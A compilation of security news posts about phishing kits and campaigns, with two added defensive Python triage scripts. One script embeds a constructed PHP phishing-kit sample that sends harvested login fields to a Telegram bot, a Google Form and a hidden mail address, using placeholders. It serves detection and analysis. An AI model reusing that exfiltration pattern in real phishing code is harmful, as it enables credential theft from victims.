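The decoy-only workbook scores 0 and the lure scores 4; in practice a macrosheet that is both veryHidden and wired to Auto_Open is reason enough on its own to hold an attachment for manual review, since a legitimate DocuSign document has no business containing Excel 4.0 macros at all.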

Threat Actors are Using Telegram & Google Forms to Obtain Stolen User Data

 

Security researchers have noted an increase in the misuse of legitimate services such as Google Forms and Telegram to collect user data stolen on phishing websites. Email remains the most popular way for threat actors to exfiltrate stolen data, but these methods foreshadow a new trend in the evolution of phishing kits.

After analyzing phishing kits over the past year, researchers at cybersecurity company Group-IB observed that more of these tools allow the stolen data to be collected via Google Forms and Telegram. 

What is a phishing kit? 

A phishing kit is a toolset that helps design and run phishing web pages mimicking a particular brand or firm, or even several at once. Phishing kits are often sold to attackers who lack strong coding skills, allowing them to build the infrastructure for large-scale phishing campaigns.

By extracting the phishing kit, security researchers can examine the methodology used to carry out the phishing attack and figure out where the stolen data is sent. In addition, a thorough examination of the phishing kit helps researchers detect digital footprints that might lead to the kit's developers.

Latest trends of 2020 

Security researchers at Group-IB identified more than 260 unique brands on cybercriminals' target lists, most of them online services (30.7%: online tools to view documents, online shopping, streaming services, and more), email clients (22.8%), and financial organizations (20%). The most exploited brands of 2020 were Microsoft, PayPal, Google, and Yahoo.

Another trend the researchers noticed was that the developers of phishing kits were double-dipping to increase their profits by adding code that copies the stream of stolen data to a host they control. Security researchers explained that one method is to configure the 'send' function to deliver the information both to the email address provided by the buyer of the phishing kit and to a concealed email address held in the 'token' variable.

“Phishing kits have changed the rules of the game in this segment of the fight against cybercrime. In the past, cybercriminals stopped their campaigns after the fraudulent resources had been blocked and quickly switched to other brands. Today, they automate their attacks and instantly replace the blocked phishing websites with new web pages,” Yaroslav Kargalev, Deputy Head at CIRT-GIB, stated.
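To show the 'send' function pattern in a form an analyst can triage, here is an added example (the editor's, not Group-IB's code or any real kit): a small static analysis over a constructed PHP send script. It lists which exfiltration channels the script uses (Telegram bot API, Google Forms, mail()) and resolves every mail() recipient, decoding base64 literals, so that a concealed second address of the double-dipping kind described above is surfaced. All addresses, tokens and IDs in the sample are placeholders.

```python
import base64
import re

# Constructed sample in the style of a phishing-kit "send" script (placeholders only).
HIDDEN = base64.b64encode(b"kit-author@example.net").decode()  # the concealed second address
SAMPLE_KIT = f"""<?php
$to = "buyer@example.com";
$token = base64_decode("{HIDDEN}");
$msg = "login: " . $_POST['email'] . " pass: " . $_POST['password'];
mail($to, "New result", $msg);
mail($token, "New result", $msg);
file_get_contents("https://api.telegram.org/bot<BOT_TOKEN_PLACEHOLDER>/sendMessage?chat_id=<CHAT_ID>&text=" . urlencode($msg));
$ch = curl_init("https://docs.google.com/forms/d/e/<FORM_ID_PLACEHOLDER>/formResponse");
"""

EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+\.[\w.-]+")
MAIL_CALL_RE = re.compile(r"\bmail\(\s*([^,]+),")          # first argument of mail()
B64_RE = re.compile(r"base64_decode\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
ASSIGN_RE = re.compile(r"(\$\w+)\s*=\s*(.+?);", re.S)       # $var = expr;


def analyze_kit(source: str) -> dict:
    """Static triage of a kit's send script: which channels, and which addresses, get the data."""
    channels = []
    if "api.telegram.org/bot" in source:
        channels.append("telegram")
    if "docs.google.com/forms" in source and "formResponse" in source:
        channels.append("google_forms")
    if MAIL_CALL_RE.search(source):
        channels.append("email")

    # Map each variable to its assigned expression, decoding base64 literals on the way.
    values = {}
    for var, expr in ASSIGN_RE.findall(source):
        m = B64_RE.search(expr)
        if m:
            try:
                expr = base64.b64decode(m.group(1)).decode("utf-8", "replace")
            except ValueError:
                pass  # not valid base64; keep the raw expression
        values[var] = expr

    # Resolve every mail() recipient through the variable table.
    recipients = []
    for arg in MAIL_CALL_RE.findall(source):
        resolved = values.get(arg.strip(), arg.strip())
        found = EMAIL_RE.findall(resolved)
        recipients.extend(found if found else [resolved])
    distinct = sorted(set(recipients))
    return {
        "channels": channels,
        "recipients": distinct,
        "double_dipping": len(distinct) > 1,  # more than one address gets a copy
    }


def analyze_sample() -> dict:
    return analyze_kit(SAMPLE_KIT)


if __name__ == "__main__":
    print(analyze_sample())
```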

“LinkedIn Private Shared Document” Shared Via Phishing Email by Hackers

LinkedIn seems to have become a popular destination for phishing attacks, and users have been targeted with phishing emails in a recent scam on the site. With the public becoming more familiar with the standard tactics used against them, cybercriminals have had to adopt new tactics to avoid detection.

JB Bowers, a security investigator, found that hackers are using LinkedIn to trick users into giving up their login credentials. The scheme attempts to get unsuspecting users to open a "LinkedIn Private Shared Document," after which their login credentials are requested on a fake LinkedIn page. The message prompts the recipient to follow a third-party link to access the document.

Any user who receives an unsolicited message from an unknown contact through LinkedIn's internal messaging system should be extremely careful, particularly if asked to enter login details. Users who mistakenly enter their credentials may then find their account used to send the same phishing message on to their LinkedIn contacts.

As to why hackers attack LinkedIn users, it may be because regular LinkedIn users have higher incomes than average and are perceived as higher-value targets. Or, since LinkedIn links to other Microsoft services such as Office 365, a hacked LinkedIn account could lead to further identity leakage. As the name suggests, phishing attempts to lure users into sending confidential details. This could take the form of emails offering a free smartphone, or something more formal, as in the case above. Further targets of phishing attacks are colleges and businesses. Hackers are now getting more advanced and will send you a bogus email that appears to have originated from your employer, since LinkedIn tells them who you deal with. Phishing pages are hosted on sites that also serve legitimate business purposes, such as Firebase and Pantheon.io, making it unlikely that companies block access to them.

“The sites use major ASNs including Fastly, Google, and Microsoft, making basic network traffic analysis for the end-user also not so useful,” Bowers stated.

Employees must be trained to recognize this form of intrusion before it leads to a broader breach of enterprise processes and networks. A further alternative is to block the use of social networks on work devices, but that may not be acceptable to workers. Victims must be made aware of the deception and should warn their LinkedIn contacts; otherwise some of those contacts will be fooled in turn and go through the same process.

“If you see any more LinkedIn messages like this […] you’ll want to let that person know out of band that their account has been compromised and that they should update their LinkedIn password, as well as report the abuse to LinkedIn,” Bowers advised.

Microsoft Office Phishing Attack Hosted on Google Firebase

A phishing campaign aimed at stealing Microsoft login credentials is using Google Firebase to bypass email security controls in Microsoft Office 365, researchers said.

Researchers at Armorblox observed invoice-themed emails sent to at least 20,000 mailboxes that purport to share information about an electronic funds transfer (EFT) payment. The emails carry a fairly generic subject line, “TRANSFER OF PAYMENT NOTICE FOR INVOICE,” and contain a link to download an “invoice” from the cloud.

Clicking on that link starts a chain of redirects that finally takes targets to a page with Microsoft Office branding hosted on Google Firebase. That page is a phishing page, designed to collect Microsoft login credentials, secondary email addresses, and phone numbers. “Since all workplace accounts are so closely interlinked, sharing credentials to one of your accounts can prove to be very dangerous as cybercriminals send emails in your name to trick your customers, partners, acquaintances and family members,” according to Armorblox.

Impersonating Microsoft to phish for account credentials remains an effective method because it lets attackers embed themselves into normal business workflows, said Rajat Upadhyaya, head of engineering at Armorblox. “Viewing documents via Office 365 is something we do every day, so victims might think it’s not unusual to enter login credentials in this situation,” Upadhyaya added. “Plus, hosting the final phishing page on Google Firebase lends the domain inherent legitimacy and allows it to bypass email security blocklists and filters.”

The email attack bypassed native Microsoft email security controls. Microsoft assigned a Spam Confidence Level (SCL) of 1 to this email, meaning it did not judge the email to be suspicious and delivered it to end-user mailboxes. By hosting the phishing page HTML on Google Firebase, an inherently trusted domain, the emails were able to slip past built-in Microsoft security filters, including Exchange Online Protection (EOP) and Microsoft Defender for Office 365.

For better protection against email-borne threats, employees should be trained to treat emails related to money and information with an "eye test" that includes examining the sender name, sender email address, the language used in the email, and any logical inconsistencies within it, according to Armorblox.

Financial Conduct Authority of UK Hit by 240,000 Spam Emails, Some Containing Malware

The UK's financial regulator was spammed with almost a quarter of a million (240,000) malicious emails in Q4 2020. The FOI data highlights the tremendous pressure big organizations face to protect their assets. Griffin Law, a litigation firm, filed the FOI request with the influential London-based agency, the FCA (Financial Conduct Authority). As per Gov.UK, "The Financial Conduct Authority (FCA) regulates the financial services industry in the UK. Its role includes protecting consumers, keeping the industry stable, and promoting healthy competition between financial service providers."

The firm says the FCA was spammed with around 240,000 malicious and unsolicited emails during the last three months of 2020, an average of 80,000 emails per month. November saw the most, at 84,723, whereas October had 81,799 and December 72,288. Most of the mails were classified as spam, whereas more than 2,400 contained malware such as trojans, worms, and spyware, says the report. Fortunately, the FCA blocked all the malicious emails it received; however, the main threat is not from these mails but from targeted spear-phishing campaigns. Tim Sadler, CEO of Tessian, emphasizes that phishing emails have become a persistent threat because it is easier to target humans than to hack machines.

Sadler said, "cyber-criminals, undoubtedly, want to get hold of the huge amounts of valuable and sensitive information that FCA staff have access to, and they have nothing but time on their hands to figure out how to get it." He further says, "it just takes a bit of research, one convincing message or one cleverly worded email, and a distracted employee to successfully trick or manipulate someone into sharing company data or handing over account credentials."

This is not the first time the regulator has had cybersecurity problems. In February last year, the regulator had to apologize publicly when it accidentally published personal information (including names and addresses) of some of the people who had lodged complaints against the agency. The irony is that the data leak happened in the regulator's response to an FOI request.

National Crime Agency Detained the Operator of SMS Bandits for Phishing Message Services

The National Crime Agency of the United Kingdom has announced the arrest of the operator of the 'SMS Bandits' service. Although the NCA did not disclose the suspect's identity, the cybercrime department of the Metropolitan Police announced the detention of a Birmingham resident linked to the company offering illicit phishing services. The platform was used to send large volumes of phishing SMS messages. The fraudster sent out a huge number of fake messages spoofing organizations such as PayPal, telecom providers, and COVID-19 pandemic relief organizations.

SMS Bandits, including the man detained, obtained account credentials for numerous popular websites by sending fake SMS messages by the million, and offered those credentials on dark web platforms they controlled. Among other pseudonyms, the operators used Bamit9, Gmuni, and Uncle Munis on the dark web. SMS Bandits supplied an SMS phishing service for the mass transmission of text messages intended to collect account credentials for various common websites and to steal personal and financial information.

Angus, a researcher at the cyber intelligence firm Scylla Intel, stated that the SMS Bandits' phishing lures were uncommonly well done and free of the grammar and spelling errors that usually make a fake message easy to spot. “Just by virtue of these guys being native English speakers, the quality of their phishing kits and lures were considerably better than most,” Angus added.

According to Scylla Intel, the SMS Bandits made a variety of operational security errors that made it relatively easy to figure out who they actually are. Scylla Intel collected further evidence against the SMS Bandits and found that they used the email addresses and passwords stolen through their services to validate the credentials.

According to the sources, the SMS Bandits are also linked to a dark web criminal service named “OTP Agency,” which is designed to intercept the one-time passwords required when logging into various websites. The modus operandi involves the customer entering the target's phone number and name, after which OTP Agency initiates an automated phone call to the target alerting them to unauthorized activity on their account.

SMS Bandits also offered its own "bulletproof hosting," marketed as a "freedom of communications" portal where clients can "host any content without restrictions." In practice, that content consists of the sites on which users of other web platforms are phished for their credentials.

According to a new survey, the volume of SMS phishing grew by over 328% in 2020. Judging by that growth, the fraudsters show little sign of being deterred.

Users on Alert as Text Scamming Attacks on the Rise


Fear of scam messages may seem a thing of the past. With the rise of well-engineered and sophisticated attacks in recent times, the threat from scam messaging may seem low; however, it remains a persistent danger. SMS (short message service) scams are similar to email phishing attacks in that they work through social engineering. Known as "smishing" (SMS and phishing), the attacks try to lure victims into providing information and user access that benefits the attacker.

Current SMS scam techniques
One current SMS scam notifies users of a package delivery, a lure considered more effective than earlier ones. If the user replies, the attacker steals user data for money theft, identity theft, or theft of sensitive organizational data. In one particular attack, the message leads the victim to a website and offers a small gift (a smartphone, for instance) in return for filling in a survey. The attackers then ask for credit card details to cover shipping and steal the money. Another SMS scam variant uses fake bank messages. The attacker lures the victim into giving away their banking credentials, and if the victim does so, the attacker uses Emotet malware to infect their devices. In some scams, the victim is threatened with violence unless a ransom is paid. The approaches in these attacks differ, but they all share a common goal: access to personal information. In each of them the victim is asked to open a link or visit a website, and the attackers use these malicious links and websites to steal user data. Other scam campaigns use relief funds, food aid, banks, COVID-19, or jury duty to fool the victim. It is difficult to anticipate the content of these attacks; in the future they will likely become even more sophisticated and dangerous, with brand new lures.

Why these attacks are successful
Scammers are constantly striving to attack smartphone users as part of larger threat campaigns. The attackers have the upper hand: first, they always come up with new techniques, and second, in most cases victims are not even aware of these attacks. In social-engineering terms, the first stage is misdirection: the user is put into an emotional state and takes whatever the text says at face value. For example, "you've got a text but there's a problem with your credit card." A different variant of this theme plays on people's likes or interests to get their attention. An attacker might use an emotional text to trigger user action. This is why people often receive scam texts about fire, politics, lotteries, or crime: attackers use these references to trigger an action and make the user click a link or open a website.

How to protect yourself from scams
It is crucial for users to know how to stay safe from these scams and attacks. Application security, mobile data protection, and mobile phone security are the key components. Here is what a user can do:

1. Avoid responding to suspicious messages, especially texts that ask you to click a link. Contact the source directly to confirm whether the information is authentic. If you get a text from a delivery service asking you to click a link to confirm, visit the service's website directly instead.

2. Do not be fooled by messages or branding that seem genuine. Fake branding is one of the most common ways of tricking users.

3. Report scam texts whenever possible, so that you and others are safer in future. Most importantly, do not assume that scamming is a threat of the past.

In reality, these attacks are on the rise, evolving daily with new techniques. Within an organization, staff must be trained to identify and report scam texts and to be prepared for these challenges.

LogoKit Can Manipulate Phishing Pages in Real Time

A recently uncovered phishing kit, named LogoKit, eliminates headaches for cybercriminals by automatically pulling the victim organization's logo onto the phishing login page. This gives attackers the tools needed to convincingly emulate organization login pages, a task that can otherwise be intricate. Cybercriminals have relied on LogoKit to launch phishing attacks on more than 700 unique domains in the course of 30 days (including 300 in the past week). The targeted services range from generic login portals to bogus SharePoint, Adobe Document Cloud, OneDrive, Office 365, and cryptocurrency exchange login portals.

“With LogoKit’s intended functionality to be centered around singular emails per URL and extracting company logos, this dramatically improves ease of carrying out targeted attacks against organizations; and reusing pretexts without changing templates,” said Adam Castleman, security researcher with RiskIQ on Wednesday. 

Phishing kits, which cybercriminals can buy for anywhere between $20 and $880, require little technical knowledge beyond modest programming skills. These kits are used to steal a range of information from victims, including usernames, passwords, credit card numbers, social security numbers, and more.

In some cases, for instance, attackers have been observed hosting their phishing pages on Google Firebase as part of the LogoKit attack. While LogoKit has been found using these legitimate hosting services, researchers have also observed compromised sites, many running WordPress, hosting LogoKit variants. Cybercriminals send victims a specially crafted URL containing their email address. An example of a crafted URL that contains the email would be: "phishingpage[.]site/login.html#victim@company.com."

If the victim clicks the URL, LogoKit then fetches the organization's logo from a third-party service, for example the marketing data engine Clearbit or Google's database of favicons (the graphic icons associated with particular web pages).

Moreover, since LogoKit is a collection of JavaScript files, its assets can also be hosted on trusted public services like Firebase, GitHub, Oracle Cloud, and others, most of which are whitelisted within corporate environments and trigger few alerts when loaded in an employee's browser. RiskIQ said it is following this new threat closely because of the kit's simplicity, which the security firm believes improves its odds of a successful phish.
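The following Python script is an added example (the editor's, not RiskIQ's or Armorblox's code) that applies two of the indicators from the Firebase and LogoKit posts above to links pulled out of an email body: a per-victim email address carried in the URL fragment, and a landing page on a shared trusted platform such as Firebase or GitHub Pages, which serves many tenants and so cannot simply be blocked by domain. The sample body, the hosts in it and the platform suffix list are constructed for illustration.

```python
import re
from urllib.parse import unquote, urlparse

# Shared platforms the posts above name as abused for phishing pages; the suffix
# list is an assumption for illustration, to be extended from your own telemetry.
SHARED_TRUSTED_HOSTS = ("web.app", "firebaseapp.com", "github.io")
EMAIL_RE = re.compile(r"^[\w.+-]+@[\w-]+(\.[\w-]+)+$")
URL_RE = re.compile(r"(?:https?|hxxps?)://[^\s<>\"']+")


def refang(url: str) -> str:
    """Undo common defanging (hxxp, [.]) so URLs copied from reports parse normally."""
    return url.replace("hxxp", "http").replace("[.]", ".")


def triage_url(url: str) -> dict:
    """Flag a per-victim fragment and shared-platform hosting for a single URL."""
    url = refang(url)
    parsed = urlparse(url)
    host = (parsed.hostname or "").lower()
    fragment = unquote(parsed.fragment).strip()
    reasons, victim = [], None
    if EMAIL_RE.match(fragment):
        # LogoKit-style link: the page derives the logo to show from this address' domain.
        victim = fragment
        reasons.append("email address in URL fragment (per-victim link)")
    if any(host == d or host.endswith("." + d) for d in SHARED_TRUSTED_HOSTS):
        reasons.append(f"landing page on shared trusted platform ({host})")
    return {"url": url, "host": host, "victim": victim, "reasons": reasons}


def triage_email_body(body: str) -> list:
    """Extract every URL in a message body and return those with findings, in order."""
    hits = []
    for raw in URL_RE.findall(body):
        result = triage_url(raw.rstrip(".,);"))  # drop trailing punctuation
        if result["reasons"]:
            hits.append(result)
    return hits


# Constructed sample body; hosts and addresses are placeholders, not real indicators.
SAMPLE_BODY = """Subject: TRANSFER OF PAYMENT NOTICE FOR INVOICE

Please review the EFT payment notice:
https://invoice-notice.web.app/view/invoice

Our support portal: https://www.example.com/support

Shared document: hxxps://phishingpage[.]site/login.html#victim@company.com
"""


def triage_sample() -> list:
    return triage_email_body(SAMPLE_BODY)


if __name__ == "__main__":
    for hit in triage_sample():
        print(hit["host"], hit["victim"], "; ".join(hit["reasons"]))
```

Because the fragment never reaches the web server, this check belongs in mail-gateway or endpoint link analysis rather than in server-side logs.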

DMV Warns New Yorkers of Text Phishing Schemes

The New York State Department of Motor Vehicles has cautioned New Yorkers about ongoing text message phishing schemes. These counterfeit text messages ask recipients to update their driver's license contact information, linking to a fake DMV site. Exploiting the ongoing adoption of the REAL ID Act of 2005 to make the scam sound authentic, the attackers have used three specific text phishing messages, said the New York State Department of Motor Vehicles (DMV).

The New York DMV described three types of text phishing messages that serve as the opening move in this attack.

• The first message informs the recipient, in broken English, that anyone holding a driver's license must "update their contact to compliance regulation agreements.”

• The second text phishing message does something similar, advising the recipient that they need to change their mailing and contact information to speed up compliance with new ID guidelines. This version of the scheme refers to REAL ID by name.

• The last text message parrots the previous two but uses the most broken grammar of the three.

All three of the driver's license phishing messages redirect to a fake DMV site designed to steal data.

The New York State DMV warned of a similar text phishing attack in October 2020. In that case, threat actors were using scam text messages to redirect people to a fake DMV site. If someone clicked on it, the attackers could target them with identity fraud or malware. In another case, a text phishing scam used a pandemic relief payment as its cover story. The message informed the recipient that they were eligible for $600 if they clicked on the embedded link. These attackers used spoofing techniques to disguise their message as genuine correspondence from New York's Department of Labor.

These attacks highlight the need for employers to protect themselves against phishing attacks claiming to be government messages. They can do so by investing in a security awareness training program. Seeing phishing attacks in a test setting can teach employees about some of the most common types of scams in use today, as well as emerging campaigns. Employers can also consider using technical controls for phishing prevention.

6.15 Lakh Facebook Users' Accounts Compromised by Facebook Ad Phishing Campaign

A large-scale ad phishing campaign that has compromised more than 6.15 lakh Facebook users' accounts has been exposed by cybersecurity researchers. The campaign spans at least 50 countries, and the accounts are reportedly being compromised by abusing pages hosted on the open source code repository GitHub.
 
ThreatNix, a Nepal-based security firm, said while giving insights into the attack that the number of affected users is rapidly increasing, at an unusual pace of over 100 entries per minute, and that the situation is expected to worsen further if the necessary steps are not taken in time.
 
The researchers noted, "the phishing campaign by a sponsored Facebook post that was offering 3GB mobile data from Nepal Telecom and was redirecting to a phishing site hosted on GitHub page; the attackers created different pages imitating the legit pages from numerous entities. The attackers were using the profile picture and name of Nepal Telecom". 
 
Additionally, the cybersecurity firm claimed in a statement this week, “similar Facebook posts were used to target the Facebook users from Pakistan, Tunisia, Norway, Malaysia, Philippines, and Norway”. According to the firm's findings, the ad phishing campaign uses localized Facebook posts containing links that redirect to a static GitHub Pages site hosting a fake Facebook login panel.
 
The cybersecurity researchers also noted that “after redirecting to a static GitHub page it forwarded the phished credentials to two endpoints one to a Firestore database and another to a domain which was owned by the phishing group”. The researchers also unearthed that nearly 500 GitHub repositories containing phishing pages are part of the identical phishing campaign. 
 
According to ThreatNix, it is working with other authorities to “bring down the phishing infrastructure by reserving the information related to the domain”. The attackers used Bitly links that initially pointed to a benign page; once the Facebook ad was approved, the link was changed to point to the phishing domain. They used Bitly links because Facebook now takes steps to ensure that such phishing pages are not approved for ads.